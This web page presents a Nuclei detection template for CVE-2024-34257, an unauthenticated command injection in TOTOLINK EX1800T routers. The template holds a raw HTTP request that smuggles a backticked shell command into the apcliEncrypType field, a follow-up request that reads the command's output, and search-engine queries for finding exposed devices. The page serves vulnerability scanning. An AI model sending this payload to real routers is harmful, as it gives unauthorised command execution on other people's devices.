Skip to content

TOTOLINK EX1800T TOTOLINK EX1800T - Command Injection

ID: CVE-2024-34257

Severity: high

Author: pussycat0x

Tags: cve,cve2024,rce,unauth

TOTOLINK EX1800T V9.1.0cu.2112_B20220316 has a vulnerability in the apcliEncrypType parameter that allows unauthorized execution of arbitrary commands, allowing an attacker to obtain device administrator privileges.

id: CVE-2024-34257
info:
name: TOTOLINK EX1800T TOTOLINK EX1800T - Command Injection
author: pussycat0x
severity: high
description: |
TOTOLINK EX1800T V9.1.0cu.2112_B20220316 has a vulnerability in the apcliEncrypType parameter that allows unauthorized execution of arbitrary commands, allowing an attacker to obtain device administrator privileges.
reference:
- https://github.com/ZackSecurity/VulnerReport/blob/cve/totolink/EX1800T/1.md
- https://immense-mirror-b42.notion.site/TOTOLINK-EX1800T-has-an-unauthorized-arbitrary-command-execution-vulnerability-2f3e308f5e1d45a2b8a64f198cacc350
- https://github.com/20142995/nuclei-templates
classification:
epss-score: 0.00043
epss-percentile: 0.0926
metadata:
vendor: totolink
product: a3700r_firmware
shodan-query: http.title:"totolink"
fofa-query: title="totolink"
google-query: intitle:"totolink"
tags: cve,cve2024,rce,unauth
variables:
file: "{{rand_base(6)}}"
http:
- raw:
- |
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Referer: {{RootURL}}/page/index.html
{
"token":"",
"apcliEncrypType":"`id>../{{file}}.txt`",
"topicurl":"setWiFiExtenderConfig"
}
- |
GET /{{file}}.txt HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_1
words:
- '"success": true'
- type: regex
part: body_2
regex:
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
- type: status
status:
- 200
# digest: 4a0a00473045022100e0a033672220289689891ec56759966f05ffc557318856fb9ae6ec6fa0019201022001fa7d09b28d51cef9258e7d8e1c6fcfd58b8b093285c8e451ca22b30f9fbe50:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-34257.yaml"

View on Github